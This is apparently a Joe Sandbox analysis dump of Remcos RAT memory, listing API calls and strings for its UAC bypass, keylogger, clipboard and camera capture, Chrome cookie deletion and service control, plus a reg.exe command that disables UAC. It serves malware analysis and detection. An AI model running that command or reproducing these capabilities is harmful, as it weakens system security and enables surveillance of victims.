                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: InitializeObjectUninitialize_wcslen
                                                                              • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                              • API String ID: 3851391207-2637227304
                                                                              • Opcode ID: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                                              • Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
                                                                              • Opcode Fuzzy Hash: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                                              • Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669
                                                                              APIs
                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
                                                                              • int.LIBCPMT ref: 0040FEF2
                                                                                • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                              • std::_Facet_Register.LIBCPMT ref: 0040FF2E
                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                              • String ID: H]G
                                                                              • API String ID: 2536120697-1717957184
                                                                              • Opcode ID: 4f42b0104d3fab8d9c54d588918312ac25f5cdf33bdc383dd9a32706d08bdfcf
                                                                              • Instruction ID: c39742161ac3258eace465d30f2780732a1ff9819e97f4bd037edafe9ec39b9f
                                                                              • Opcode Fuzzy Hash: 4f42b0104d3fab8d9c54d588918312ac25f5cdf33bdc383dd9a32706d08bdfcf
                                                                              • Instruction Fuzzy Hash: 9011BF31900419ABCB24FBA5C8468DDB7799F95318B20007FF505B72C1EB78AF09C799
                                                                              APIs
                                                                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
                                                                              • GetLastError.KERNEL32 ref: 0040B2EE
                                                                              Strings
                                                                              • UserProfile, xrefs: 0040B2B4
                                                                              • [Chrome Cookies found, cleared!], xrefs: 0040B314
                                                                              • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
                                                                              • [Chrome Cookies not found], xrefs: 0040B308
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: DeleteErrorFileLast
                                                                              • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                              • API String ID: 2018770650-304995407
                                                                              • Opcode ID: 9f2292de5349cbb89b874ac3832283976b5779146be5ef793b8f579563e3040a
                                                                              • Instruction ID: 647c9f6895dd19beb09db90be4e639f81332b1b521455d1adc7a9c6a9ee315b4
                                                                              • Opcode Fuzzy Hash: 9f2292de5349cbb89b874ac3832283976b5779146be5ef793b8f579563e3040a
                                                                              • Instruction Fuzzy Hash: 3301A23164410557CB047BB5DD6B8AF3624ED50708F60013FF802B32E2FE3A9A0586CE
                                                                              APIs
                                                                              • AllocConsole.KERNEL32(00474358), ref: 0041BEB9
                                                                              • ShowWindow.USER32(00000000,00000000), ref: 0041BED2
                                                                              • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BEF7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Console$AllocOutputShowWindow
                                                                              • String ID: Remcos v$5.3.0 Pro$CONOUT$
                                                                              • API String ID: 2425139147-2527699604
                                                                              • Opcode ID: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                                              • Instruction ID: 482f1cdaf256b8236abc94a0b12de3dc55517b66349f776fa4240982defd8f75
                                                                              • Opcode Fuzzy Hash: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                                              • Instruction Fuzzy Hash: 180171B19803047BD600FBF29D4BFDD37AC9B14705F5004277644E7093EABCA554866D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (CG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$BG
                                                                              • API String ID: 0-3292752334
                                                                              • Opcode ID: e181011d619ffb8157927409b25ecf3a74985ff587143acc6985ebda069ccb43
                                                                              • Instruction ID: a0817f974ad937f6cb5b9dd001e5131ae01746641b95ac10126ddf8aadfa6e31
                                                                              • Opcode Fuzzy Hash: e181011d619ffb8157927409b25ecf3a74985ff587143acc6985ebda069ccb43
                                                                              • Instruction Fuzzy Hash: 05F096B17022109BDB103774BC1967A3645A780356F01847BF94BFA6E5DB3C8851869C
                                                                              APIs
                                                                              • __allrem.LIBCMT ref: 00439789
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397A5
                                                                              • __allrem.LIBCMT ref: 004397BC
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397DA
                                                                              • __allrem.LIBCMT ref: 004397F1
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043980F
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                              • String ID:
                                                                              • API String ID: 1992179935-0
                                                                              • Opcode ID: 90d3cbeaf7f932440d57ef5c22d3b8f6324572cbadffe2a0eaa56fc6fd551e6e
                                                                              • Instruction ID: 29148231e9435c1f59b8c02308e8e4f0c882d016d38a0f6ab7871d26eba04b65
                                                                              • Opcode Fuzzy Hash: 90d3cbeaf7f932440d57ef5c22d3b8f6324572cbadffe2a0eaa56fc6fd551e6e
                                                                              • Instruction Fuzzy Hash: 7A811B726017069BE724AE79CC82B6F73A8AF49328F24512FF511D66C1E7B8DD018B58
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: __cftoe
                                                                              • String ID:
                                                                              • API String ID: 4189289331-0
                                                                              • Opcode ID: 69df1f9648de409375186bf4c737c9597d71512c260aa95240f454dab3e526b7
                                                                              • Instruction ID: 646e0444ce84107b4b6d0ff1d92098e8eb0dfa86acef9ec08128487301265115
                                                                              • Opcode Fuzzy Hash: 69df1f9648de409375186bf4c737c9597d71512c260aa95240f454dab3e526b7
                                                                              • Instruction Fuzzy Hash: A851FC72900105ABFB249F598C81F6F77A9EFC9324F15421FF815A6281DB3DDD01866D
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: __freea$__alloca_probe_16
                                                                              • String ID: a/p$am/pm
                                                                              • API String ID: 3509577899-3206640213
                                                                              • Opcode ID: a9dc0d208de5fd7d1fb00aaf9429c157d058a6ef8680621eaae3a775435586b8
                                                                              • Instruction ID: cf09b504ad0dd49156c227457699755419044adef71e8be36bbdd309731302d4
                                                                              • Opcode Fuzzy Hash: a9dc0d208de5fd7d1fb00aaf9429c157d058a6ef8680621eaae3a775435586b8
                                                                              • Instruction Fuzzy Hash: 5FD1F271A00206EAFB249F68D945ABBB7B0FF06300F26415BE905AB749D37D8D41CB5B
                                                                              APIs
                                                                              • Sleep.KERNEL32(00000000), ref: 00403E8A
                                                                                • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: H_prologSleep
                                                                              • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
                                                                              • API String ID: 3469354165-462540288
                                                                              • Opcode ID: 2cf3f80b4c45a769136f44c7a35df47687b06a420c3cb7c44c4a57c06eb58bf2
                                                                              • Instruction ID: 0dce3c58988623f436d5c5d916b021fc345e3c2d86dff9f08dc17926b78fee06
                                                                              • Opcode Fuzzy Hash: 2cf3f80b4c45a769136f44c7a35df47687b06a420c3cb7c44c4a57c06eb58bf2
                                                                              • Instruction Fuzzy Hash: A441A330A0420197CA14FB79C816AAD3A655B45704F00453FF809A73E2EF7C9A45C7CF
                                                                              APIs
                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419DFC
                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E10
                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E1D
                                                                              • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419507), ref: 00419E52
                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E64
                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E67
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                              • String ID:
                                                                              • API String ID: 493672254-0
                                                                              • Opcode ID: b1a54bb8a8b8a5801daee02f654969ed363d70646ac738354a8241f6c324f73f
                                                                              • Instruction ID: c28812c6d5a3476d8c1fe7dae916194da5da8b168be8dbaba893861dad7fc5da
                                                                              • Opcode Fuzzy Hash: b1a54bb8a8b8a5801daee02f654969ed363d70646ac738354a8241f6c324f73f
                                                                              • Instruction Fuzzy Hash: 3301F5311483147AD7119B39EC5EEBF3AACDB42B71F10022BF526D62D1DA68DE8181A9
                                                                              APIs
                                                                              • GetLastError.KERNEL32(?,?,00437DFD,004377B1), ref: 00437E14
                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E22
                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E3B
                                                                              • SetLastError.KERNEL32(00000000,?,00437DFD,004377B1), ref: 00437E8D
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLastValue___vcrt_
                                                                              • String ID:
                                                                              • API String ID: 3852720340-0
                                                                              • Opcode ID: 91ac95939cd3c96bc489c52a0530c238d3093d1082c7131376b84a6130b97103
                                                                              • Instruction ID: be779a20f6972cc68ff7cd304671387be2c97454b743a33de387a584dbd8fa65
                                                                              • Opcode Fuzzy Hash: 91ac95939cd3c96bc489c52a0530c238d3093d1082c7131376b84a6130b97103
                                                                              • Instruction Fuzzy Hash: 2A01D8B222D315ADEB3427757C87A172699EB09779F2013BFF228851E1EF294C41914C
                                                                              APIs
                                                                              • GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                                                              • _free.LIBCMT ref: 00446EF6
                                                                              • _free.LIBCMT ref: 00446F1E
                                                                              • SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F2B
                                                                              • SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                                                              • _abort.LIBCMT ref: 00446F3D
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast$_free$_abort
                                                                              • String ID:
                                                                              • API String ID: 3160817290-0
                                                                              • Opcode ID: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                                              • Instruction ID: 3d2b287d931d31d162837175e2379b90ae0e47a7897f975c134f35b9cb22fcab
                                                                              • Opcode Fuzzy Hash: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                                              • Instruction Fuzzy Hash: 2AF0F93560870177F6226339BD45A6F16559BC37A6F36003FF414A2293EE2D8C46451F
                                                                              APIs
                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C2F
                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C43
                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C50
                                                                              • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C5F
                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C71
                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C74
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                                              • String ID:
                                                                              • API String ID: 221034970-0
                                                                              • Opcode ID: 7cfb46db0bd01be278475ff74c7fe9cf9f01c1ce40244ff157d84eb2ddeeab7a
                                                                              • Instruction ID: e05d85410d15b39c35b215a1997cf582e970b4d0c8f2e3caff6268b58306b2a8
                                                                              • Opcode Fuzzy Hash: 7cfb46db0bd01be278475ff74c7fe9cf9f01c1ce40244ff157d84eb2ddeeab7a
                                                                              • Instruction Fuzzy Hash: F2F0F6325003147BD3116B25EC89EFF3BACDB45BA1F000036F902921D2DB68CD4685F5
                                                                              APIs
                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D31
                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D45
                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D52
                                                                              • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D61
                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D73
                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D76
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                                              • String ID:
                                                                              • API String ID: 221034970-0
                                                                              • Opcode ID: bfc840ceb24970ac6f0157abf75dddf4ec976f1f73edc1b4d2479d4f1225fd6b
                                                                              • Instruction ID: 9e91e616c68215657d038be5823d6e3897a30bcf6e0764f9fcdf2292ad9a2404
                                                                              • Opcode Fuzzy Hash: bfc840ceb24970ac6f0157abf75dddf4ec976f1f73edc1b4d2479d4f1225fd6b
                                                                              • Instruction Fuzzy Hash: C5F062725003146BD2116B65EC89EBF3BACDB45BA5B00003AFA06A21D2DB68DD4696F9
                                                                              APIs
                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419D96
                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DAA
                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DB7
                                                                              • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DC6
                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DD8
                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DDB
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                                              • String ID:
                                                                              • API String ID: 221034970-0
                                                                              • Opcode ID: b33f3c56d08176086889cf85995723947178cb2cbd7dc05acdbbeb3f21c9258b
                                                                              • Instruction ID: abda6543b9bae7672c93be1b0f3a8a56711a85df89096aceaf06b6c73a90a6e4
                                                                              • Opcode Fuzzy Hash: b33f3c56d08176086889cf85995723947178cb2cbd7dc05acdbbeb3f21c9258b
                                                                              • Instruction Fuzzy Hash: C2F0C2325002146BD2116B24FC49EBF3AACDB45BA1B04003AFA06A21D2DB28CE4685F8
                                                                              APIs
                                                                              • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Enum$InfoQueryValue
                                                                              • String ID: [regsplt]$DG
                                                                              • API String ID: 3554306468-1089238109
                                                                              • Opcode ID: 2c0c651cac9b710f1168a485f464d1fc739dd231b9536622f25106be1a0f90b4
                                                                              • Instruction ID: 09469598a034e88a10af8fecb22bb8a395a4bc85e225d04bcc93034602455e52
                                                                              • Opcode Fuzzy Hash: 2c0c651cac9b710f1168a485f464d1fc739dd231b9536622f25106be1a0f90b4
                                                                              • Instruction Fuzzy Hash: D8512E72108345AFD310EB61D995DEFB7ECEF84744F00493EB585D2191EB74EA088B6A
                                                                              APIs
                                                                                • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                              • __Init_thread_footer.LIBCMT ref: 0040AEA7
                                                                                • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                                                              • String ID: [End of clipboard]$[Text copied to clipboard]$,]G$0]G
                                                                              • API String ID: 2974294136-753205382
                                                                              • Opcode ID: aa5d334bcd1812922a4ad084044b3d1b343442b21def6a42fbfd5f9bd3c8e3e6
                                                                              • Instruction ID: 172b4b58ae75f988d3b3a293bba3f35c56e57800f0e036023c2a0486d145437f
                                                                              • Opcode Fuzzy Hash: aa5d334bcd1812922a4ad084044b3d1b343442b21def6a42fbfd5f9bd3c8e3e6
                                                                              • Instruction Fuzzy Hash: 44219F31A002099ACB14FB75D8929EE7774AF54318F50403FF406771E2EF386E4A8A8D
                                                                              APIs
                                                                              • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                                                                              • wsprintfW.USER32 ref: 0040A905
                                                                                • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: EventLocalTimewsprintf
                                                                              • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                                              • API String ID: 1497725170-248792730
                                                                              • Opcode ID: 5536b12de62e79ab966806e0976d2ab96bef4cf8c19547705f00cc0b9e04f46c
                                                                              • Instruction ID: 8a7b6ca92c081f7f17d03b5bac770d689c192d548357e869dbc211d44db93d1d
                                                                              • Opcode Fuzzy Hash: 5536b12de62e79ab966806e0976d2ab96bef4cf8c19547705f00cc0b9e04f46c
                                                                              • Instruction Fuzzy Hash: BB118172400118AACB18BB56EC55CFE77BCAE48325F00013FF842620D1EF7C5A86C6E9
                                                                              APIs
                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                              • Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: File$CloseCreateHandleSizeSleep
                                                                              • String ID: `AG
                                                                              • API String ID: 1958988193-3058481221
                                                                              • Opcode ID: 1410e1d813e280eb6b4e08600abbe884787e407ed37892b11411430ae0a0b870
                                                                              • Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
                                                                              • Opcode Fuzzy Hash: 1410e1d813e280eb6b4e08600abbe884787e407ed37892b11411430ae0a0b870
                                                                              • Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D
                                                                              APIs
                                                                              • RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                                              • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                                              • GetLastError.KERNEL32 ref: 0041CA91
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ClassCreateErrorLastRegisterWindow
                                                                              • String ID: 0$MsgWindowClass
                                                                              • API String ID: 2877667751-2410386613
                                                                              • Opcode ID: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                                              • Instruction ID: bff961279ea7560c1ff94ea7b7e8445e3758215821d07408c43b005d8adda241
                                                                              • Opcode Fuzzy Hash: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                                              • Instruction Fuzzy Hash: 2D01E9B1D1431EAB8B01DFE9DCC4AEFBBBDBE49255B50452AE410B2200E7704A448BA5
                                                                              APIs
                                                                              • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
                                                                              • CloseHandle.KERNEL32(?), ref: 00406A0F
                                                                              • CloseHandle.KERNEL32(?), ref: 00406A14
                                                                              Strings
                                                                              • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
                                                                              • C:\Windows\System32\cmd.exe, xrefs: 004069FB
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseHandle$CreateProcess
                                                                              • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                              • API String ID: 2922976086-4183131282
                                                                              • Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                              • Instruction ID: 91eee74bc7ca160cae255ad37e89f65ee2415c19472677646c1a5aeb81073604
                                                                              • Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                              • Instruction Fuzzy Hash: 8AF030B69002A9BACB30ABD69C0EFDF7F7DEBC6B11F00042AB615A6051D6745144CAB9
                                                                              APIs
                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044258A,004453F8,?,0044252A,004453F8,0046DAE0,0000000C,00442681,004453F8,00000002), ref: 004425F9
                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044260C
                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,0044258A,004453F8,?,0044252A,004453F8,0046DAE0,0000000C,00442681,004453F8,00000002,00000000), ref: 0044262F
                                                                              Strings
                                                                              Memory Dump Source
